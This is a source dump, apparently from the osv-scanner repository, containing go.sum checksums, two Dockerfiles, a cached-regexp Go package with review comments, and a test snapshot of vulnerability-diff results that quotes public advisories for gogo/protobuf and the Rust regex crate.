h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod 
h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE= google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= gopkg.in/dnaeon/go-vcr.v4 v4.0.6 h1:PiJkrakkmzc5s7EfBnZOnyiLwi7o7A9fwPzN0X2uwe0= gopkg.in/dnaeon/go-vcr.v4 v4.0.6/go.mod h1:sbq5oMEcM4PXngbcNbHhzfCP9OdZodLhrbRYoyg09HY= gopkg.in/ini.v1 v1.67.1 h1:tVBILHy0R6e4wkYOn3XmiITt/hEVH4TFMYvAX2Ytz6k= gopkg.in/ini.v1 v1.67.1/go.mod h1:x/cyOwCgZqOkJoDIJ3c1KNHMo10+nLGAhh+kn3Zizss= gopkg.in/warnings.v0 v0.1.2 h1:wFXVbFY8DY5/xOe1ECiWdKCzZlxgshcYVNkBHstARME= gopkg.in/warnings.v0 v0.1.2/go.mod h1:jksf8JmL6Qr/oQM2OXTHunEvvTAsrWBLb6OOjuVWRNI= gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= gopkg.in/yaml.v2 v2.4.0/go.mod 
h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gotest.tools/v3 v3.5.1 h1:EENdUnS3pdur5nybKYIh2Vfgc8IUNBjxDPSjtiJcOzU= gotest.tools/v3 v3.5.1/go.mod h1:isy3WKz7GK6uNw/sbHzfKBLvlvXwUyV06n6brMxxopU= honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= modernc.org/cc/v4 v4.26.2 h1:991HMkLjJzYBIfha6ECZdjrIYz2/1ayr+FL8GN+CNzM= modernc.org/cc/v4 v4.26.2/go.mod h1:uVtb5OGqUKpoLWhqwNQo/8LwvoiEBLvZXIQ/SmO6mL0= modernc.org/ccgo/v4 v4.28.0 h1:rjznn6WWehKq7dG4JtLRKxb52Ecv8OUGah8+Z/SfpNU= modernc.org/ccgo/v4 v4.28.0/go.mod h1:JygV3+9AV6SmPhDasu4JgquwU81XAKLd3OKTUDNOiKE= modernc.org/fileutil v1.3.8 h1:qtzNm7ED75pd1C7WgAGcK4edm4fvhtBsEiI/0NQ54YM= modernc.org/fileutil v1.3.8/go.mod h1:HxmghZSZVAz/LXcMNwZPA/DRrQZEVP9VX0V4LQGQFOc= modernc.org/gc/v2 v2.6.5 h1:nyqdV8q46KvTpZlsw66kWqwXRHdjIlJOhG6kxiV/9xI= modernc.org/gc/v2 v2.6.5/go.mod h1:YgIahr1ypgfe7chRuJi2gD7DBQiKSLMPgBQe9oIiito= modernc.org/goabi0 v0.2.0 h1:HvEowk7LxcPd0eq6mVOAEMai46V+i7Jrj13t4AzuNks= modernc.org/goabi0 v0.2.0/go.mod h1:CEFRnnJhKvWT1c1JTI3Avm+tgOWbkOu5oPA8eH8LnMI= modernc.org/libc v1.66.3 h1:cfCbjTUcdsKyyZZfEUKfoHcP3S0Wkvz3jgSzByEWVCQ= modernc.org/libc v1.66.3/go.mod h1:XD9zO8kt59cANKvHPXpx7yS2ELPheAey0vjIuZOhOU8= modernc.org/mathutil v1.7.1 h1:GCZVGXdaN8gTqB1Mf/usp1Y/hSqgI2vAGGP4jZMCxOU= modernc.org/mathutil v1.7.1/go.mod h1:4p5IwJITfppl0G4sUEDtCr4DthTaT47/N3aT6MhfgJg= modernc.org/memory v1.11.0 h1:o4QC8aMQzmcwCK3t3Ux/ZHmwFPzE6hf2Y5LbkRs+hbI= modernc.org/memory v1.11.0/go.mod 
h1:/JP4VbVC+K5sU2wZi9bHoq2MAkCnrt2r98UGeSK7Mjw= modernc.org/opt v0.1.4 h1:2kNGMRiUjrp4LcaPuLY2PzUfqM/w9N23quVwhKt5Qm8= modernc.org/opt v0.1.4/go.mod h1:03fq9lsNfvkYSfxrfUhZCWPk1lm4cq4N+Bh//bEtgns= modernc.org/sortutil v1.2.1 h1:+xyoGf15mM3NMlPDnFqrteY07klSFxLElE2PVuWIJ7w= modernc.org/sortutil v1.2.1/go.mod h1:7ZI3a3REbai7gzCLcotuw9AC4VZVpYMjDzETGsSMqJE= modernc.org/sqlite v1.38.0 h1:+4OrfPQ8pxHKuWG4md1JpR/EYAh3Md7TdejuuzE7EUI= modernc.org/sqlite v1.38.0/go.mod h1:1Bj+yES4SVvBZ4cBOpVZ6QgesMCKpJZDq0nxYzOpmNE= modernc.org/strutil v1.2.1 h1:UneZBkQA+DX2Rp35KcM69cSsNES9ly8mQWD71HKlOA0= modernc.org/strutil v1.2.1/go.mod h1:EHkiggD70koQxjVdSBM3JKM7k6L0FbGE5eymy9i3B9A= modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y= modernc.org/token v1.1.0/go.mod h1:UGzOrNV1mAFSEB63lOFHIpNRUVMvYTc6yu1SMY/XTDM= osv.dev/bindings/go v0.0.0-20260306051416-1f963c5a9f4f h1:B0XTb5DYHKy+Fy/z2BFgnBeTik2yPAcUDiPNnqouxGI= osv.dev/bindings/go v0.0.0-20260306051416-1f963c5a9f4f/go.mod h1:OVdSVs0ycryhh/ctD+AzobnK9YwV0ap9487js1AYP9M= sigs.k8s.io/yaml v1.4.0/go.mod h1:Ejl7/uTz7PSA4eKMyQCUTnhZYNmLIl+5c2lQPGR2BPY= sigs.k8s.io/yaml v1.6.0 h1:G8fkbMSAFqgEFgh4b1wmtzDnioxFCUgTZhlbj5P9QYs= sigs.k8s.io/yaml v1.6.0/go.mod h1:796bPqUfzR/0jLAl6XjHl3Ck7MiyVv8dbTdyT3/pMf4= www.velocidex.com/golang/go-ntfs v0.2.0 h1:JLS4hOQLupiVzo+1z4Xb8AZyIaXHDmiGnKyoM/bRYq0= www.velocidex.com/golang/go-ntfs v0.2.0/go.mod h1:itvbHQcnLdTVIDY6fI3lR0zeBwXwBYBdUFtswE0x1vc= www.velocidex.com/golang/regparser v0.0.0-20250203141505-31e704a67ef7 h1:BMX/37sYwX+8JhHt+YNbPfbx7dXG1w1L1mXonNBtjt0= www.velocidex.com/golang/regparser v0.0.0-20250203141505-31e704a67ef7/go.mod h1:pxSECT5mWM3goJ4sxB4HCJNKnKqiAlpyT8XnvBwkLGU= ================================================ FILE: goreleaser-action.dockerfile ================================================ # Copyright 2024 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Image for the GitHub Action variant: it packages the prebuilt osv-scanner and
# osv-reporter binaries and starts them through exit_code_redirect.sh.

# The base image is pinned by digest. The tag is kept for readability; the
# digest is what decides which image content is pulled.
FROM golang:1.26.1-alpine3.23@sha256:2389ebfa5b7f43eeafbd6be0c3700cc46690ef842ad962f6c5bd6be49ed82039

# NOTE(review): these packages carry no version pin, so their versions are
# resolved from the Alpine repositories at build time, unlike the base image.
RUN apk --no-cache add \
  ca-certificates \
  git \
  bash

# Allow git to run on mounted directories
# safe.directory '*' switches off git's repository-ownership check for every
# path. That check exists so git does not act on configuration found in a
# repository owned by a different user; with it off, the image relies on the
# mounted workspace being trusted.
# NOTE(review): if the mount path is fixed, listing only that path keeps the
# ownership check in force everywhere else.
RUN git config --global --add safe.directory '*'

# Built binaries provided by goreleaser
# No USER instruction appears in this file, so the entrypoint runs as the base
# image's default user (presumably root, given WORKDIR /root/ - confirm).
WORKDIR /root/
COPY ./osv-scanner-action ./osv-scanner
COPY ./osv-reporter ./
COPY ./exit_code_redirect.sh ./

# /root is appended to PATH so the copied binaries resolve by name.
ENV PATH="${PATH}:/root"

ENTRYPOINT ["bash", "/root/exit_code_redirect.sh"]

================================================
FILE: goreleaser.dockerfile
================================================
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
FROM golang:1.26.1-alpine3.23@sha256:2389ebfa5b7f43eeafbd6be0c3700cc46690ef842ad962f6c5bd6be49ed82039

RUN apk add --no-cache \
  ca-certificates \
  git

# Allow git to run on mounted directories
RUN git config --global --add safe.directory '*'

WORKDIR /
COPY osv-scanner ./

ENTRYPOINT ["/osv-scanner"]

================================================
FILE: internal/cachedregexp/regex.go
================================================
// Package cachedregexp provides a cached version of regexp.MustCompile and regexp.Compile.
package cachedregexp

import (
	"regexp"
	"sync"
)

// cache maps a pattern string to its compiled *regexp.Regexp and is shared by
// MustCompile and Compile. Nothing in this file removes entries, so every
// distinct pattern stays in memory for the life of the process.
// NOTE(review): that suits a fixed set of patterns written in source code. If a
// caller passes patterns taken from scanned files or user input, the cache has
// no upper bound - confirm against the callers.
var cache sync.Map

// MustCompile returns the compiled form of exp, compiling it on first use and
// returning the cached value on later calls.
//
// Like regexp.MustCompile, it panics when exp is not a valid pattern, so it is
// only suitable for patterns known to be valid. Compile reports the error
// instead of panicking.
func MustCompile(exp string) *regexp.Regexp {
	compiled, ok := cache.Load(exp)
	if !ok {
		// Two goroutines can both miss and both compile the same pattern.
		// LoadOrStore keeps the value stored first and hands it to both.
		compiled, _ = cache.LoadOrStore(exp, regexp.MustCompile(exp))
	}

	return compiled.(*regexp.Regexp)
}

// Compile returns a compiled regexp or an error if the pattern is invalid.
// Results are cached for performance.
//
// Only successful compilations are stored: the error path returns before the
// cache is written, so an invalid pattern is compiled again on every call.
func Compile(exp string) (*regexp.Regexp, error) {
	compiled, ok := cache.Load(exp)
	if ok {
		return compiled.(*regexp.Regexp), nil
	}

	r, err := regexp.Compile(exp)
	if err != nil {
		return nil, err
	}

	// The caller receives the value compiled here. If another goroutine stored
	// the same pattern first, the cache keeps that earlier value and r is used
	// by this caller only.
	cache.LoadOrStore(exp, r)

	return r, nil
}

================================================
FILE: internal/ci/__snapshots__/vulnerability_result_diff_test.snap
================================================
[TestDiffVulnerabilityByUniqueVulnCountResults/new_has_one_less_vuln - 1] {} --- [TestDiffVulnerabilityByUniqueVulnCountResults/same_everything - 1] {} --- [TestDiffVulnerabilityByUniqueVulnCountResults/same_package_with_new_vuln - 1] { "GHSA-c3h9-896r-86jm": 1 } --- [TestDiffVulnerabilityByUniqueVulnCountResults/same_packages_with_different_source_path - 1] {} --- [TestDiffVulnerabilityResults/new_has_one_less_vuln - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/new_vuln_and_packages - 1] { "results": [ { "source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "packages": [ {
"package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm" ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "max_severity": "8.6" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "type": "CVSS_V3" } ], "summary": "Improper Input Validation in GoGo Protobuf" } ] } ] }, { "source": { "path": "/path/to/scorecard-check-osv-e2e/sub-rust-project/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "regex", "version": "1.5.1", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-m5pq-gvj9-9vr8", "RUSTSEC-2022-0013" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-m5pq-gvj9-9vr8/GHSA-m5pq-gvj9-9vr8.json" }, "package": { "ecosystem": "crates.io", "name": "regex", "purl": "pkg:cargo/regex" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.5.5" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-24713" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-03-08T20:00:36Z", "nvd_published_at": "2022-03-08T19:15:00Z", "severity": "HIGH" }, "details": "\u003e This is a cross-post of [the official security advisory][advisory]. The official advisory contains a signed version with our PGP key, as well.\n\n[advisory]: https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw\n\nThe Rust Security Response WG was notified that the `regex` crate did not properly limit the complexity of the regular expressions (regex) it parses. An attacker could use this security issue to perform a denial of service, by sending a specially crafted regex to a service accepting untrusted regexes. 
No known vulnerability is present when parsing untrusted input with trusted regexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses of the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately to the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. 
Because of this, we do not recommend denying known problematic regexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy](https://www.rust-lang.org/policies/security), and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini for coordinating the disclosure and writing this advisory.", "id": "GHSA-m5pq-gvj9-9vr8", "modified": "2022-08-11T20:38:52Z", "published": "2022-03-08T20:00:36Z", "references": [ { "type": "WEB", "url": "https://github.com/rust-lang/regex/security/advisories/GHSA-m5pq-gvj9-9vr8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24713" }, { "type": "WEB", "url": "https://github.com/rust-lang/regex/commit/ae70b41d4f46641dbc45c7a4f87954aea356283e" }, { "type": "PACKAGE", "url": "https://github.com/rust-lang/regex/" }, { "type": "WEB", "url": "https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00009.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JANLZ3JXWJR7FSHE57K66UIZUIJZI67T/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O3YB7CURSG64CIPCDPNMGPE4UU24AB6H/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PDOWTHNVGBOP2HN27PUFIGRYNSNDTYRJ/" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0013.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-08" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-14" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5113" }, { "type": 
"WEB", "url": "https://www.debian.org/security/2022/dsa-5118" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ], "summary": "Rust's regex crate vulnerable to regular expression denial of service" }, { "affected": [ { "database_specific": { "categories": [ "denial-of-service" ], "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2022-0013.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } }, "package": { "ecosystem": "crates.io", "name": "regex", "purl": "pkg:cargo/regex" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "1.5.5" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-24713", "GHSA-m5pq-gvj9-9vr8" ], "details": "The Rust Security Response WG was notified that the `regex` crate did not\nproperly limit the complexity of the regular expressions (regex) it parses. An\nattacker could use this security issue to perform a denial of service, by\nsending a specially crafted regex to a service accepting untrusted regexes. No\nknown vulnerability is present when parsing untrusted input with trusted\nregexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability\nis \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\nof the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service\nattacks caused by untrusted regexes, or untrusted input matched by trusted\nregexes. Those (tunable) mitigations already provide sane defaults to prevent\nattacks. 
This guarantee is documented and it's considered part of the crate's\nAPI.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent\nuntrusted regexes to take an arbitrary amount of time during parsing, and it's\npossible to craft regexes that bypass such mitigations. This makes it possible\nto perform denial of service attacks by sending specially crafted regexes to\nservices accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this\nissue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately\nto the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are\npractically infinite regexes that could be crafted to exploit this\nvulnerability. Because of this, we do not recommend denying known problematic\nregexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according\nto the [Rust security policy][1], and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini\nfor coordinating the disclosure and writing this advisory.\n\n[1]: https://www.rust-lang.org/policies/security", "id": "RUSTSEC-2022-0013", "modified": "2023-06-13T13:10:24Z", "published": "2022-03-08T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/regex" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0013.html" }, { "type": "WEB", "url": "https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ], "summary": "Regexes with large repetitions on empty sub-expressions take a very long time to parse" } ] } ] } ], "experimental_config": { 
"licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/old_package_replaced_with_new_package - 1] { "results": [ { "source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/brandnew/package", "version": "1.0.0", "ecosystem": "Go" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/old_vuln_and_packages_gone - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/same_everything - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/same_packages_but_with_one_moved - 1] { "results": [ { "source": { "path": "/path/to/different-dir/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "groups": [ { "ids": [ "GO-2021-0053" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. 
If parsing messages from untrusted parties, this may be used as a denial of service vector.", "id": "GO-2021-0053", "modified": "2023-06-12T18:45:41Z", "published": "2021-04-14T20:04:52Z", "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.4.0", "summary": "Panic due to improper input validation in github.com/gogo/protobuf" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/same_packages_with_new_vuln - 1] { "results": [ { "source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm" ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "max_severity": "8.6" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. 
plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "type": "CVSS_V3" } ], "summary": "Improper Input Validation in GoGo Protobuf" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- ================================================ FILE: internal/ci/testdata/not-json.txt ================================================ this is not valid json! 
